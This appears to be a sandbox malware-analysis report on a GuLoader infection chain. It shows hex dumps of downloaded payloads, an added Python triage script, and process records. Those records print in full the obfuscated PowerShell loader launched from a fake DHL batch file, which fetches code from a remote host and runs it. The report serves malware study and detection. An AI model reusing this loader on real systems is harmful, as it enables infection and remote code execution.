                    2024-07-15 15:37:56 UTC8000INData Raw: 91 f1 46 b4 1f 46 36 0f 2e 1e 82 d0 de 07 f1 8b 04 3e 7f 4c 15 c7 2f 35 42 0e f0 93 ca a4 29 11 fe e9 f9 0d 32 61 31 3b 12 aa 3a 44 96 20 59 8e ca b9 39 63 77 c1 a0 7e 9c 55 42 1b 9c 1f 59 b8 76 9b bd c3 f8 c3 5d 40 f2 23 10 57 8f 6f c0 0f c0 7a 72 f3 57 b7 15 da c3 62 d8 a7 f5 ce d5 39 ab 55 20 da 59 9d 46 f2 69 94 fa 11 ad 4d 6c d8 14 2a 68 ec 37 43 f6 cb 89 bc 84 ae 84 04 73 31 93 3d c3 37 2c 48 de da fa 4c 75 d2 7d e3 8a 10 33 87 4b 5b 93 e4 2c a5 90 8b 60 fe 70 f2 32 86 f6 17 21 55 42 fe 9f 56 e9 f8 50 b9 2f ed 62 17 85 d7 76 18 c4 7b 79 96 bd 5b 6d 46 d7 d2 fc 93 4c 6b f7 cd 62 a3 00 0c d4 fb 23 68 3e bd 60 4d d8 1b c8 a6 2a 38 01 fb 16 82 85 8f e6 89 d2 b2 be 42 48 06 d2 cd 58 b6 c6 da 34 90 07 0e da af 48 a2 4d 09 df 10 2e 80 2c e0 c9 35 c6 e7 51
                    Data Ascii: FF6.>L/5B)2a1;:D Y9cw~UBYv]@#WozrWb9U YFiMl*h7Cs1=7,HLu}3K[,`p2!UBVP/bv{y[mFLkb#h>`M*8BHX4HM.,5Q
                    2024-07-15 15:37:56 UTC8000INData Raw: c4 ec 14 6a 27 81 95 9d cf bb ac b6 02 b2 d2 31 55 c0 2a 07 ae 2f a7 7b 82 06 51 96 ad 43 41 06 f7 20 d3 37 83 2d 6b 15 27 af f6 f2 87 4c d5 a9 6a ff 10 57 6d 7b c3 17 45 d5 ad dd 9b 31 78 53 17 96 d1 ce 35 c9 05 45 88 15 63 32 a4 b8 99 03 8c 0b 8b 67 2d 38 b4 e5 7c 06 90 2e ea b6 55 1e 76 85 47 d9 7c 3f 68 dc 54 5f 78 bf b7 c5 b8 6e 1d 28 71 a0 46 d2 81 aa 2c 93 24 79 f3 e7 ba 48 31 19 bd 6f 2a 99 32 dd 04 ab f0 9f 3a 28 ec 91 93 de 33 cf 9b f3 83 70 79 d9 72 99 9f 8a 91 5a 01 0f 94 0e 97 93 17 47 75 5a 7d 11 f4 a8 b4 e9 1b 24 b4 2e 5a 78 c8 60 f6 2d 2d bc 99 43 67 8a 8a ca da 67 68 a3 19 38 44 00 d7 30 e1 07 28 19 3b eb 1e 61 02 0b 47 bc 8d bc 9c 9c 9a cf cf a7 4c 69 97 29 ef 26 dd 24 16 e1 47 cf 4c 7a f9 3a 11 f0 9c 76 42 b8 82 e2 12 2c bb 33 c7 b1 17
                    Data Ascii: j'1U*/{QCA 7-k'LjWm{E1xS5Ec2g-8|.UvG|?hT_xn(qF,$yH1o*2:(3pyrZGuZ}$.Zx`--Cggh8D0(;aGLi)&$GLz:vB,3
                    2024-07-15 15:37:56 UTC8000INData Raw: c9 bd 03 21 22 e4 14 e6 a4 75 70 da 1d c3 95 22 cf b4 1d e3 1d e2 c9 b7 56 c2 7a 51 59 03 4d de 66 26 b7 8b 4c 0e df 98 ae 78 06 80 c5 cc 76 c6 5e 03 30 76 05 6c 06 da c1 63 30 90 33 7c 18 02 0a 7f a4 9d af 74 f8 13 00 53 d9 6e 6a 36 a9 b7 bb d1 9b df 69 4f 49 5f 38 23 9f 54 e1 e7 2e 20 04 f2 94 e2 76 96 43 c7 d6 8d 64 9c f8 12 b2 7c 7a 57 66 c1 3e a1 28 a0 06 da 7e 26 ac 71 aa 4e b2 f0 01 35 bf 63 2d f6 b2 7a ad e0 22 2e aa 64 20 62 15 04 d2 89 30 d2 26 8e 9e 13 82 32 fb be 87 9c 22 67 11 fd 99 16 ad b9 ca 01 96 b0 e7 ce 66 5d 18 cc 6c 51 90 8d b5 fd 06 5b f8 e8 48 13 07 3a 5d 45 6d bb 1c b6 89 2c 80 15 44 69 65 1c 91 c0 f0 23 f3 21 85 1f 0d ca 3c 9c 44 db 3d 31 8b b1 61 43 76 7a 21 9e c5 87 e5 de 33 c1 5d 4f 16 50 31 25 d1 12 ee 0b b7 58 33 f1 0a 63 fd
                    Data Ascii: !"up"VzQYMf&Lxv^0vlc03|tSnj6iOI_8#T. vCd|zWf>(~&qN5c-z".d b0&2"gf]lQ[H:]Em,Die#!<D=1aCvz!3]OP1%X3c
                    2024-07-15 15:37:56 UTC8000INData Raw: e3 55 dd d8 74 d7 72 c0 10 7e 0c ac ec 0c cb b4 bf 30 1f d3 f4 aa d3 78 37 b7 b4 e9 6d a6 8c 78 ce c0 4c 66 a1 3b b5 14 20 4b 85 98 d3 48 2d 94 4a a1 11 0c 20 6b 45 a9 2d 38 83 db 6b ad 63 b5 54 65 2c 3c be dc e3 bc 6d 15 2d 56 9e 1d 99 08 a2 5e 29 cf 45 c4 65 a4 4b f3 67 2c c6 4e dd 70 20 7a 59 25 e9 0b 19 84 6e 51 30 8e 00 fa b4 16 03 b7 a5 4a dc e2 81 cd b9 ea e5 fd ff c5 7c 18 f9 97 b9 be 38 49 42 41 df 51 8f e6 a5 bb 72 2e a8 11 d9 a0 6e f4 eb 26 64 07 d2 fc 4b 08 85 0e 82 ab 7e d2 94 dc ae 4c a1 7f b5 aa 04 93 48 9c 91 c8 b5 8f d8 b8 ed 72 54 d3 5e fa a9 fd b7 37 8e 7d d0 a6 27 ad f4 0b 64 ca ff 97 33 ed b5 04 68 cb 31 c2 d8 60 a7 0e fc 9f 6a e5 0b 4a e9 cd bc c6 4b 02 66 82 68 01 64 8c 8e e0 e8 86 7e f1 90 21 96 0c fe 3c cc ea 2a d0 a2 8e c2 be da
                    Data Ascii: Utr~0x7mxLf; KH-J kE-8kcTe,<m-V^)EeKg,Np zY%nQ0J|8IBAQr.n&dK~LHrT^7}'d3h1`jJKfhd~!<*
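The two response bodies above are worth comparing by hand. The Samsende.jpb body fetched by powershell.exe is base64 text; its first groups decode to 71 01 9B EB 02 6A AD BB 03 A0 19 00, which is x86 for jno $+3; fwait; jmp $+4; two skipped bytes; mov ebx, 0x19a003: code that keeps hopping over filler bytes with short jumps. The duWJGPYoYurORY170.bin body fetched by the injected wab.exe is raw, high-entropy bytes with no such pattern. The script below is an added triage example, not part of the Joe Sandbox report and not the sample's own code. It embeds the first 64 base64 characters and the first 48 raw bytes copied from the captures above, decodes the base64 stage, and counts short forward jumps (EB or 70..7F followed by a displacement of 1 to 4 bytes) as a cheap junk-jump indicator. The displacement cut-off of 4 and the reading of those jumps as loader padding are assumptions made here, not findings of the report.

```python
import base64
import math
import re

# Constructed from the report's captured bytes: the first 64 base64 characters
# of the Samsende.jpb response (PowerShell stage) and the first 48 raw bytes of
# the duWJGPYoYurORY170.bin response (wab.exe stage).
STAGE1_BODY = b"cQGb6wJqrbsDoBkA6wJ2a3EBmwNcJARxAZvrAnEIuUoWw3RxAZtxAZuB8RrQ0dbr"
STAGE2_BODY = bytes.fromhex(
    "1e2076abfe6d3cd996d83b0c34ed7e708b3e3aca236105bef0b9928cf261464e"
    "d96d1a493dfa755e35794dee655ead61"
)

B64_RE = re.compile(rb"\A[A-Za-z0-9+/]+={0,2}\Z")


def looks_base64(data: bytes) -> bool:
    """True when the body is pure base64 alphabet with a decodable length."""
    return bool(B64_RE.match(data)) and len(data) % 4 == 0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; bounded above by log2(len(data)) for short samples."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(
        (c / n) * math.log2(c / n)
        for c in (data.count(bytes([b])) for b in set(data))
    )


def short_jumps(code: bytes, max_disp: int = 4) -> list:
    """Offsets of 'jmp short' (EB) and 'jcc short' (70..7F) whose forward
    displacement is at most max_disp bytes, i.e. hops over filler bytes.
    max_disp=4 is an assumption chosen here, not a documented constant."""
    hits = []
    for i in range(len(code) - 1):
        op, disp = code[i], code[i + 1]
        if (op == 0xEB or 0x70 <= op <= 0x7F) and 1 <= disp <= max_disp:
            hits.append((i, "jmp" if op == 0xEB else "jcc %02x" % op, disp))
    return hits


def triage(body: bytes) -> dict:
    """Classify one captured HTTP body: decode it if it is base64 text, then
    measure junk-jump density and entropy of the bytes that remain."""
    decoded = base64.b64decode(body, validate=True) if looks_base64(body) else None
    code = decoded if decoded is not None else body
    jumps = short_jumps(code)
    return {
        "base64": decoded is not None,
        "decoded": decoded,
        "short_jumps": len(jumps),
        "jump_density": len(jumps) / len(code),
        "entropy": shannon_entropy(code),
    }


if __name__ == "__main__":
    for name, body in (("Samsende.jpb", STAGE1_BODY),
                       ("duWJGPYoYurORY170.bin", STAGE2_BODY)):
        r = triage(body)
        head = (r["decoded"] or body)[:12].hex(" ")
        print(f"{name}: base64={r['base64']} short_jumps={r['short_jumps']} "
              f"density={r['jump_density']:.2f} entropy={r['entropy']:.2f} "
              f"head={head}")
```

On these prefixes the PowerShell stage yields eight short jumps in 48 decoded bytes, while the wab.exe stage yields none and scores higher entropy; a sample this small only shows the direction of the difference, so run the same checks over the full 483164 and 271424 byte bodies before drawing conclusions.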



                    Target ID:0
                    Start time:11:36:57
                    Start date:15/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" "
                    Imagebase:0x7ff740e40000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo 
aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. 
OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
                    Imagebase:0x7ff788560000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:11:37:00
                    Start date:15/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
                    Imagebase:0x7ff740e40000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:11:37:07
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo 
aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. 
OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
                    Imagebase:0x950000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
